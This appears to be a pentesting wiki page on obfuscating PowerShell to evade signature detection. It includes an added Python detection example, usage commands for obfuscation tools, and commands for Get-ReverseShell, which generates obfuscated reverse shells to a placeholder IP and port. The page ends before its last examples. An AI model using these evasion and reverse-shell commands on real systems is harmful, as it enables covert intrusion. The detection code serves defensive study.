PowerShell Obfuscation

Theory

The following techniques aim to evade signature-based detection by obfuscating PowerShell scripts and commands.
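To show the defender's side of this point, here is an added Python example (not code from this page or from any of the tools listed below) in which a literal signature misses an obfuscated command while a feature-based heuristic still flags it; both script samples are constructed for the example.

```python
import re

# Constructed samples (not output of any tool on the page): one plain command and an
# obfuscated-style rewrite using the format operator, concatenation, & and a backtick.
PLAIN = "Invoke-Expression (Get-Content .\\payload.ps1 -Raw)"
OBFUSCATED = ("&('{1}{0}{2}' -f 'ke-Expr','Invo','ession') "
              "((&('Get-Con'+'tent') .\\pa`yload.ps1 -Raw))")

# A naive static signature: the literal cmdlet name or its alias.
SIGNATURE = re.compile(r"Invoke-Expression|\bIEX\b", re.IGNORECASE)

# Lexical features obfuscators emit and that ordinary scripts rarely combine.
FEATURES = {
    "format_operator": re.compile(r"['\"]\s*-f\s+['\"]", re.IGNORECASE),
    "string_concat": re.compile(r"['\"]\s*\+\s*['\"]"),
    "backtick_in_word": re.compile(r"[A-Za-z]`[A-Za-z]"),
    "char_cast": re.compile(r"\[char\]", re.IGNORECASE),
    "call_operator_on_expr": re.compile(r"&\s*\("),
    "encoded_command": re.compile(
        r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE),
}

def signature_match(script: str) -> bool:
    """True if the literal signature appears anywhere in the script text."""
    return SIGNATURE.search(script) is not None

def obfuscation_features(script: str) -> dict:
    """Count how often each obfuscation feature occurs in the script."""
    return {name: len(rx.findall(script)) for name, rx in FEATURES.items()}

def symbol_ratio(script: str) -> float:
    """Share of characters that are neither alphanumeric nor whitespace."""
    symbols = sum(1 for c in script if not (c.isalnum() or c.isspace()))
    return symbols / max(len(script), 1)

def obfuscation_score(script: str) -> int:
    """Capped feature hits, plus a bonus when the text is symbol-heavy."""
    score = sum(min(n, 3) for n in obfuscation_features(script).values())
    if symbol_ratio(script) > 0.3:
        score += 2
    return score

def is_suspicious(script: str, threshold: int = 3) -> bool:
    return obfuscation_score(script) >= threshold

if __name__ == "__main__":
    for label, s in (("plain", PLAIN), ("obfuscated", OBFUSCATED)):
        print(f"{label}: signature={signature_match(s)} "
              f"score={obfuscation_score(s)} suspicious={is_suspicious(s)}")
```

Heuristics like this complement, rather than replace, PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log), which records script blocks as the engine executes them, including inner layers that obfuscated code unwraps at runtime, so the plain signature can be applied to those log entries as well.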

Practice

Invoke-PsObfuscation

Invoke-PSObfuscation is a powerful PowerShell obfuscation tool.

We can import the tool as follows.

Import-Module ./Invoke-PSObfuscation.ps1

To obfuscate a PowerShell file, use the following cmdlet.

# Using all switches
Invoke-PSObfuscation -Path in.ps1 -PipelineVariables -Pipes -Cmdlets -Methods -Integers -Aliases -Comments -NamespaceClasses -Variables -Strings -OutFile out.ps1

Get-ReverseShell

Get-ReverseShell is a tool with the sole purpose of producing obfuscated reverse shells for PowerShell.

We can import the tool as follows.

Import-Module ./get-reverseshell.ps1

To generate a reverse shell, use the following cmdlet.

# To stdout
Get-ReverseShell -Ip $IP -Port $PORT

# To file
Get-ReverseShell -Ip $IP -Port $PORT -OutFile /path/to/rev.ps1

Invoke-Obfuscation

Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator. Even though it is quite old, it is still relevant for bypassing static detections.

We can import and start the tool as follows.

Here are some usage examples:
